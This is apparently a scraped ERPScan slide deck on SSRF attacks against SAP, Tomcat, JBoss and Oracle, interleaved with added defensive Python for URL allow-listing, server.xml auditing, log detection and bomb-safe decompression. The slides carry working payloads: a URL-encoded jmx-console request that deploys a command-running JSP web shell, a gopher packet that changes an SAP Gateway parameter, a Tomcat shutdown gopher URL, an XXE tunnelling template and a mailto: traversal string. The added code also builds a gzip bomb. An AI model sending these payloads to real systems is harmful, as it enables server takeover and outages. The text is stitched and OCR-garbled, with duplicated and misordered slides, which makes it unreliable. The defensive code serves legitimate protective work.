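    bomb_jar = jar([("big.bin", b"\x00" * (4 * 1024 * 1024))])
    return good_gz, bomb_gz, clean_jar, traversal_jar, bomb_jar


if __name__ == "__main__":
    good_gz, bomb_gz, clean_jar, traversal_jar, bomb_jar = build_samples()
    print("good gzip ->", gunzip_bounded(good_gz, 1024))
    for label, fn in [("gzip bomb", lambda: gunzip_bounded(bomb_gz, 1 << 20)),
                      ("traversal jar", lambda: check_jar(traversal_jar, 1 << 20)),
                      ("jar bomb", lambda: check_jar(bomb_jar, 1 << 20))]:
        try:
            fn()
        except (DecompressionLimit, ValueError) as e:
            print(f"{label} -> refused: {e}")
```

The ratio gate in check_jar is a heuristic and only inspects what the archive declares; the byte counting in gunzip_bounded and read_member_bounded is the actual guarantee, and the two belong together. The same cap should apply per entity when an XML engine resolves many external entities, which is the "multiple entities with links to big data" case on slide 80.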
  
Counter-attack on mailto: parser

•  mailto:%00%00............................//..//..//..//..//../../../../../../windows/system32/aaaa.exe
•  Successfully read the file
•  There should be an RCE but….

82

Found yesterday :)
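The counter-attack slides above (SMB, FTP, HTTP, jar:, mailto:) and the local-SSRF and Gateway examples before them share one root cause: the application hands a caller-influenced URI to a multiprotocol client. Below is an added example of the allow-list check that removes most of those vectors at the source; it is written for this page and is not ERPScan's or any vendor's code. The policy accepts only http and https to ports 80 and 443, refuses credentials, NUL bytes and ".." segments in the path, and resolves the host so that every returned address must be externally routable (a name resolving to 172.16.0.1 or 127.0.0.1, or to one public plus one private address, is rejected). The resolver is injectable; FAKE_DNS and the host names in it are constructed for the demo, and 93.184.216.34 and 8.8.8.8 merely stand in for public addresses.

```python
"""Allow-list policy for URLs a server-side component fetches on a caller's behalf."""
import ipaddress
import socket
from urllib.parse import unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https"}      # no gopher:, jar:, mailto:, ftp:, file:, UNC
ALLOWED_PORTS = frozenset({80, 443})     # shuts out 3300/3301, 8005, 8080 and friends
DEFAULT_PORTS = {"http": 80, "https": 443}


def is_internal(ip):
    """True for any address an outbound fetch must never reach."""
    return (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_multicast
            or ip.is_reserved or ip.is_unspecified)


def resolve_with_dns(host):
    """Default resolver: IP literals pass through, names go to getaddrinfo()."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})


def check_outbound_url(url, resolve=resolve_with_dns):
    """Return (ok, reason). resolve(host) yields the IP strings the host maps to;
    every one of them must be external, so split or mixed DNS answers fail too."""
    try:
        parts = urlsplit(url)
    except ValueError as e:
        return False, f"unparseable URL: {e}"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme or '(none)'!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed"
    try:
        port = parts.port if parts.port is not None else DEFAULT_PORTS[scheme]
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    path = unquote(parts.path)
    if "\x00" in path or ".." in path.replace("\\", "/").split("/"):
        return False, "NUL byte or '..' segment in path"
    try:
        addrs = [ipaddress.ip_address(a) for a in resolve(parts.hostname)]
    except (OSError, ValueError) as e:
        return False, f"resolution failed: {e}"
    if not addrs:
        return False, "host did not resolve"
    for ip in addrs:
        if is_internal(ip):
            return False, f"{parts.hostname} resolves to internal address {ip}"
    return True, "ok"


# Constructed DNS table for the demo. The internal targets mirror the slides;
# 93.184.216.34 and 8.8.8.8 are just routable addresses standing in for partners.
FAKE_DNS = {
    "localhost": ["127.0.0.1"],
    "gateway.internal.example": ["172.16.0.1"],
    "partner.example": ["93.184.216.34"],
    "rebinding.example": ["8.8.8.8", "10.0.0.5"],   # mixed answer: must be refused
}


def fake_resolve(host):
    """Offline stand-in for resolve_with_dns() using FAKE_DNS."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return FAKE_DNS.get(host, [])


# Constructed URLs covering the vectors discussed on the slides.
DEMO_URLS = [
    "https://partner.example/api/orders",
    "gopher://172.16.0.1:3301/a%00%00%00%7A",
    "http://localhost:8080/jmx-console/HtmlAdaptor?action=invokeOpByName",
    "http://localhost/jmx-console/",
    "mailto:%00%00..//..//../windows/system32/aaaa.exe",
    "jar:http://partner.example/lib.jar!/x",
    r"\\partner.example\share\file",
    "http://gateway.internal.example/",
    "http://rebinding.example/",
    "http://partner.example/a/%2e%2e/b",
]

if __name__ == "__main__":
    for u in DEMO_URLS:
        ok, why = check_outbound_url(u, fake_resolve)
        print(f"{'ALLOW' if ok else 'DENY '} {u}  ({why})")
```

Resolving the name inside the check and then connecting by name leaves a window for a DNS answer to change between the two; a fetch layer that pins the connection to the vetted address (or re-validates the peer address after connect) closes it. Scheme allow-listing is the part that matters most for the counter-attack class: an embedded client that is never handed gopher:, jar:, mailto:, ftp: or UNC paths has no SMB, FTP or jar parser exposed to a hostile server in the first place.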
  
83

Conclusion?

84

“Let’s put it under a firewall” is not a solution anymore

XXE Scanner

85
  
Conclusion 2

•  SSRF attacks are very dangerous
•  They have a very wide range, which is still poorly covered
•  Gopher example is not the only one, I suppose
•  It is still a big research area
•  A lot of technologies and applications can be used for SSRF
•  I only check those places where I am working a lot
•  But there are still many uncovered areas
•  OWASP-EAS SSRF wiki
•  Let’s make the biggest database of SSRFs
•  Mail me if you have any ideas

86
  
 
	
  
Web: www.erpscan.com
e-mail: info@erpscan.com
Twitter: @erpscan
@sh2kerr

87
  

  • 62. XXE  Tunneling  to  Buffer  Overflow  (Hint  2)   •  Next  step  is  to  pack  this  packet  B  into  Packet  A     •  We  need  to  insert  non-­‐printable  symbols     •  God  bless  gopher;  it  supports  urlencode  like  HTTP   •  It  will  also  help  us  evade  aLack  against  IDS  systems       62   POST  /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post  HTTP/1.1   Host:  sapserver.com:80   Content-­‐Length:  7730     <?xml  version="1.0"  encoding="ISO-­‐8859-­‐1"?>    <!DOCTYPE  foo  [      <!ELEMENT  foo  ANY  >    <!ENTITY  date  SYSTEM  “gopher://[Urlencoded  Packet  B]"  >]>    <foo>&date;</foo>   Packet  A  
  • 63. XXE  Tunneling  to  Buffer  Overflow  (Result)   63   Server  B  in  DMZ   (SAP  ERP)   Server  A  on  the   Internet   (SAP  XI)     hLp://company.com   172.16.0.1   POST  /XISOAPAdapter/servlet/ com.sap.aii.af.mp.soap.web.DilbertMSG? format=post  HTTP/1.1   Host:  sapserver.com:80     <?xml  version="1.0"  encoding="ISO-­‐8859-­‐1"?>    <!DOCTYPE  foo  [      <!ELEMENT  foo  ANY  >    <!ENTITY  date  SYSTEM  “gopher://[packetB]"   >]>    <foo>&date;</foo>   Port  8000   WebRFC   service   Packet  B     Shellcode   service  with   DNS   payload   Packet  C  –  Command  and   Control  response  to  a^acker  by   DNS  protocol  which  is  allowed   for  outband  connecQons  
  • 64. Full  control  over  the  internal  system  through   the  Internet   64  
  • 65. So,  you  can  only  send  one  packet  by  gopher   but  you  can’t  control  the  session…   Hmm,  actually,  some8mes  you  can.     65  
  • 66. Session  handling  by  SSRF  (trick  1)   •  Using  Gopher,  it  is  possible  to  send  mul8ple  packets  in  one   session      Just  add  them  like  this   –  Gopher://[packet1][packet2][packet3].....   –  But  you  must  know  the  session  ID  or  use  a  protocol  without  session  ID   like  telnet   66   Successfully  tested  for  SAP  Message  Server  param.  change  
  • 67. Session  handling  by  SSRF  (trick  2)   •  Just  theoreQcal       •  Let’s  suppose  that  session  is  handled  by  the  IP  and  port  of  client   •  First  packet  is  sent  from  some  random  port,  for  example,  3000   •  Collect  info  about  the  session  from  the  response   •  Construct  the  second  packet  (next  8me,  the  source  port  will  be   3001,  3002…  etc.)   •  Send  the  second  packet  un8l  the  source  port  will  be  3000  again     67   Needs  tes8ng  
• 68. Now let's talk about different SSRF attacks: when we attack the same host with SSRF
• 69. SSRF back-connect attack
•  Local SSRF: the idea is to initiate a connection to localhost services on Server A itself
•  Counter-attack: the idea is to send Packet A to Server A; the service must take Packet B and send it to the attacker's Server C. Server C then returns a malformed response to Server A and triggers a client-side vulnerability in the application.
• 70. Local SSRF
•  The first example is local SSRF
•  We try to attack localhost ports on the same server with SSRF
•  There are a lot of ports listened on by the OS and applications at localhost, and usually they are less secure, because being bound to loopback is their only access control
Currently working on a database of the most interesting ports
• 71. But you want examples... OK OK!
• 72. Local SSRF to Tomcat shutdown
•  Tomcat shutdown port 8005 (the <Server port="8005" shutdown="SHUTDOWN"> element in server.xml)
•  Open only for localhost
•  gopher://localhost:8005/SHUTDOWN%0d%0a
•  Writing the configured shutdown command to the port stops the server; the stock command is SHUTDOWN, so no secret is needed
Successfully exploitable (tnx Alexey Sintsov)
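As an added example (not from the slides), the check a defender would run against the shutdown listener this slide abuses, plus the hardened setting: the server.xml is constructed, and the audit also lists connectors bound to loopback, since local SSRF turns exactly that surface into remote surface.

```python
"""Audit a Tomcat server.xml for services whose only protection is being bound to
localhost, i.e. exactly what a local SSRF reaches. Added example; the server.xml
below is constructed with Tomcat's stock shutdown settings."""
import secrets
import xml.etree.ElementTree as ET

LOOPBACK = {"127.0.0.1", "localhost", "::1", "0:0:0:0:0:0:0:1"}

SAMPLE_SERVER_XML = """\
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" />
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1" />
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps" />
    </Engine>
  </Service>
</Server>
"""


def audit_server_xml(xml_text):
    """Return (severity, message) findings; the shutdown listener comes first."""
    server = ET.fromstring(xml_text)
    findings = []
    port = server.get("port", "8005")
    command = server.get("shutdown", "SHUTDOWN")
    address = server.get("address", "localhost")
    if port != "-1":  # -1 disables the shutdown listener entirely
        if command == "SHUTDOWN":
            findings.append(("high",
                f"shutdown listener {address}:{port} accepts the stock command: "
                f"gopher://{address}:{port}/SHUTDOWN%0d%0a stops Tomcat"))
        else:
            findings.append(("medium",
                f"shutdown listener {address}:{port} is enabled with a custom command; "
                "still reachable by local SSRF if that command leaks"))
    for connector in server.iter("Connector"):
        address = connector.get("address")
        if address in LOOPBACK:
            findings.append(("info",
                f"{connector.get('protocol', 'HTTP/1.1')} connector "
                f"{address}:{connector.get('port')} is bound to loopback only; "
                "locality is its only access control"))
    return findings


def harden_shutdown(xml_text, disable=True):
    """Rewrite <Server>: disable the shutdown port (the operator then stops Tomcat
    by signal) or replace the command with a random secret. ElementTree drops
    comments and the XML declaration on re-serialisation, so in practice edit
    server.xml by hand; this shows the target state."""
    server = ET.fromstring(xml_text)
    if disable:
        server.set("port", "-1")
    else:
        server.set("shutdown", secrets.token_urlsafe(24))
    return ET.tostring(server, encoding="unicode")


if __name__ == "__main__":
    for severity, message in audit_server_xml(SAMPLE_SERVER_XML):
        print(f"[{severity}] {message}")
    print("after hardening:", audit_server_xml(harden_shutdown(SAMPLE_SERVER_XML)))
```

A custom shutdown string only downgrades the finding: the port is still a loopback service reachable through any SSRF on the same host, so port="-1" is the setting to aim for.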
• 73. Local SSRF to Oracle Listener
•  Problem
–  An old vulnerability in the Oracle listener: set_log_file (the listener can be told to write its log to an arbitrary file)
–  Secured by LOCAL_OS_AUTHENTICATION in 10g, which restricts listener administration to local connections
•  Attack
–  A user with CONNECT privileges can run UTL_TCP functions
–  Using UTL_TCP, it is possible to construct any TCP packet and send it to the listener
–  The connection will come from a local IP, so we bypass the LOCAL_OS_AUTHENTICATION restriction
Tested in early 2008
• 74. Local SSRF to JBoss console
•  JBoss JMX management console (jmx-console)
•  Even with a simple HTTP request
•  Open only for localhost
•  The request invokes store() on the jboss.admin:service=DeploymentFileRepository MBean: arg0 (shell.war), arg1 (shell) and arg2 (.jsp) name the file, and arg3 is a URL-encoded JSP that passes its comment parameter to Runtime.getRuntime().exec() and echoes the output, i.e. a web shell deployed at /shell/shell.jsp
http://localhost:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=shell.war&argType=java.lang.String&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e&argType=boolean&arg4=True
tnx Alexey Sintsov for sploit
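Detection for this request pattern, as an added example that is not from the slides: run over constructed AccessLogValve lines (made up for the example, with the arg3 JSP abbreviated), it flags invokeOp calls on the JMX console, marks a loopback source as the local-SSRF signature, and correlates a later hit on the file the store() call dropped. The set of deploy operations is an assumption to tune per environment.

```python
"""Detect jmx-console abuse in JBoss/Tomcat access-log lines, flagging the local
SSRF case where the request arrives from loopback, and follow-up hits on the file
it dropped. Added example; the log lines are constructed (arg3 is abbreviated)."""
import re
from urllib.parse import parse_qs, urlsplit

# AccessLogValve "common" pattern: host ident user [time] "request" status bytes
ACCESS_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
LOOPBACK = {"127.0.0.1", "::1", "0:0:0:0:0:0:0:1"}
CONSOLE_PATHS = ("/jmx-console/", "/web-console/")
# Operations routinely used to drop code: DeploymentFileRepository.store,
# MainDeployer.deploy, DeploymentScanner.addURL. Assumption: extend per environment.
DEPLOY_OPS = {"store", "deploy", "addURL"}

SAMPLE_LOG = """\
127.0.0.1 - - [23/May/2012:10:15:32 +0000] "GET /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=shell.war&argType=java.lang.String&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20%70%61%67%65%20%25%3e&argType=boolean&arg4=True HTTP/1.1" 200 1475
10.1.2.3 - - [23/May/2012:10:15:40 +0000] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system%3Atype%3DServerInfo HTTP/1.1" 200 8741
127.0.0.1 - - [23/May/2012:10:16:01 +0000] "GET /shell/shell.jsp?comment=id HTTP/1.1" 200 312
192.0.2.44 - - [23/May/2012:10:16:05 +0000] "GET /index.html HTTP/1.1" 200 1024
"""


def _dropped_path(folder, name, ext):
    """store("shell.war", "shell", ".jsp", ...) lands at /shell/shell.jsp."""
    context = folder[:-4] if folder.endswith(".war") else folder
    return "/" + context + "/" + name + ext


def detect(lines):
    """Return alert dicts in log order."""
    alerts = []
    dropped = {}  # URL path written through the console -> timestamp of the store call
    for raw in lines:
        m = ACCESS_LINE.match(raw)
        if not m:
            continue  # not a line in the expected access-log pattern
        src, ts = m.group("src"), m.group("ts")
        parts = urlsplit(m.group("target"))
        if parts.path in dropped:
            alerts.append({"kind": "webshell_hit", "severity": "high", "src": src,
                           "path": parts.path, "dropped_at": dropped[parts.path]})
            continue
        if not parts.path.startswith(CONSOLE_PATHS):
            continue
        q = parse_qs(parts.query)
        if not q.get("action", [""])[0].startswith("invokeOp"):
            continue  # browsing the console is noisy; act on invocations only
        op = q.get("methodName", [""])[0]
        args = [q.get("arg%d" % i, [""])[0] for i in range(5)]
        alert = {
            "kind": "jmx_invoke",
            "severity": "high" if op in DEPLOY_OPS else "medium",
            "src": src,
            "loopback": src in LOOPBACK,  # loopback source: SSRF pivot or a local process
            "mbean": q.get("name", [""])[0],
            "op": op,
            "embedded_jsp": "<%" in args[3],
        }
        if op == "store" and args[0] and args[1]:
            alert["drops"] = _dropped_path(args[0], args[1], args[2])
            dropped[alert["drops"]] = ts
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

The loopback flag is the interesting bit for this slide: a console invocation whose source address is 127.0.0.1 was made by something on the box itself, which in a hardened deployment should be nobody, so it is either the SSRF pivot or a compromised local process.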
• 75. Bypass SAP security restrictions
•  It is possible to bypass many SAP security restrictions based on ACLs, because the connection now originates from a trusted address
–  SAP Gateway
–  SAP Message Server
–  Other remote services
Gateway example (the decoded packet carries the parameter name gw/max_sleep, i.e. a gateway parameter change):
gopher://172.16.0.1:3301/a%00%00%00%7A%43%4F%4E%54%00%02%00%7A%67%77%2F%6D%61%78%5F%73%6C%65%65%70%00%00%00%00%79%02%00%00%00%00%00%00%28%DE%D9%00%79%5F%00%74%08%B5%38%7C%00%00%00%00%44%DE%D9%00%00%00%00%00%00%00%00%00%70%DE%D9%00%00%00%00%00%EA%1E%43%00%08%38%38%00%00%00%00%00%10%44%59%00%18%44%59%00%00%00%00%00%64%DE%D9%00%79%5F%00%74%08%B5%38%7C%00%00%00%00%79%DE%D9%00%00%00%00%7A%DE%D9%00%B3%56%35%7C%48%EF%38%7C%5F%57%35%7C%0A%00%00%00%B8%EE
• 77. Counter-attack SSRF
•  This is the most interesting way to use SSRF, which was not discussed before
•  We send a command from Server A to our Server C using SSRF, and then we generate a response which will trigger a vulnerability in an application on Server A
•  Some interesting attacks are also possible
New life for client-side bugz
• 78. Counter-attack on SMB client
•  DoS by reading huge files remotely
•  SMBRelay
•  RCE vulnerabilities in the SMB client
–  MS10-006
–  MS10-020
–  MS11-019
–  MS11-043
Looking for a working example of a client-side bug
• 79. Counter-attack on FTP client
•  Memory corruption vulnerabilities in FTP clients
–  Some examples: https://www.corelan.be/index.php/2010/10/12/death-of-an-ftp-client/
•  Client-side path traversal
–  Those types of vulnerabilities are rare nowadays, but there are some chances to find them in industrial systems, because they were created a long time ago
Working on real examples
• 80. Counter-attack on HTTP client
The most widespread type of SSRF request is HTTP. It means that vulnerabilities in embedded HTTP clients (which are used by different XML engines, for example) are the most sought-after part of our future research
–  DoS by multiple entities with links to big data
–  DoS by multiple GZIP bombs
Working on real examples
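The GZIP-bomb item above, as an added example not from the slides: the attacker's Server C answers the SSRF'd request with a small body that inflates to hundreds of megabytes, and the client-side fix is a decompressor with an output cap. The payload and the response are constructed here; zero-filled data is used because deflate compresses it at roughly 1000:1.

```python
"""Counter-attack on an HTTP client: a gzip bomb served by the attacker's Server C,
and the bounded decompression a client needs in order to survive it.
Added example; the payload is constructed here, not taken from the slides."""
import gzip
import io
import zlib


def gzip_bomb(decompressed_size):
    """Gzip `decompressed_size` zero bytes, written in 1 MiB chunks so that
    building it needs little memory. Deflate on zeros compresses ~1000:1."""
    buf = io.BytesIO()
    chunk = b"\x00" * (1 << 20)
    with gzip.GzipFile(fileobj=buf, mode="wb", compresslevel=9) as gz:
        remaining = decompressed_size
        while remaining > 0:
            n = min(remaining, len(chunk))
            gz.write(chunk[:n])
            remaining -= n
    return buf.getvalue()


def http_response_for(body, content_type="text/xml"):
    """The response Server C returns for the SSRF'd request: an honest
    Content-Length, but a body that explodes when the client inflates it."""
    head = (
        "HTTP/1.1 200 OK\r\n"
        f"Content-Type: {content_type}\r\n"
        "Content-Encoding: gzip\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return head.encode("ascii") + body


def naive_inflated_size(data):
    """What an unguarded client does: inflate everything, then look at it."""
    return len(gzip.decompress(data))


def safe_gunzip(data, max_out):
    """Inflate at most `max_out` bytes and refuse anything larger, instead of
    allocating whatever the attacker's stream expands to."""
    d = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)  # 16+ selects gzip framing
    out = d.decompress(data, max_out + 1)
    if len(out) > max_out or d.unconsumed_tail:
        raise ValueError("decompressed size exceeds %d bytes" % max_out)
    out += d.flush()
    if len(out) > max_out:
        raise ValueError("decompressed size exceeds %d bytes" % max_out)
    return out


if __name__ == "__main__":
    bomb = gzip_bomb(256 * 1024 * 1024)
    print(len(bomb), "bytes on the wire ->", naive_inflated_size(bomb), "bytes inflated")
    print(http_response_for(bomb)[:120])
    try:
        safe_gunzip(bomb, 8 * 1024 * 1024)
    except ValueError as err:
        print("bounded client rejected it:", err)
```

The same cap belongs on every decompressing layer the SSRF'd client has (Content-Encoding, a zipped JAR fetched over jar:, XML entity expansion), since the attacker chooses which one to target.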
• 81. Counter-attack on JAR parser
XML engines support the jar: scheme. Calling some URL using this scheme, the JAR parser opens a remote archive and takes a file from it. If there is a file parsing vulnerability in the JAR parser, it will be possible to attack the server.
•  Directory traversal
–  Tested: JDK jar parser, not vulnerable
•  Jar bombs
Working on real examples
• 82. Counter-attack on mailto: parser
•  mailto:%00%00.......................... ..//..//..//..//..//../../../../../../windows/system32/aaaa.exe
•  Successfully read the file
•  There should be an RCE but....
Found yesterday :)
• 84. Conclusion?
"Let's put it under a firewall" is not a solution anymore
• 86. Conclusion 2
•  SSRF attacks are very dangerous
•  They have a very wide range, which is still poorly covered
•  The gopher example is not the only one, I suppose
•  It is still a big research area
•  A lot of technologies and applications can be used for SSRF
•  I only check those places where I am working a lot
•  But there are still many uncovered areas
•  OWASP-EAS SSRF wiki
•  Let's make the biggest database of SSRFs
•  Mail me if you have any ideas
• 87. Web: www.erpscan.com
e-mail: info@erpscan.com
Twitter: @erpscan @sh2kerr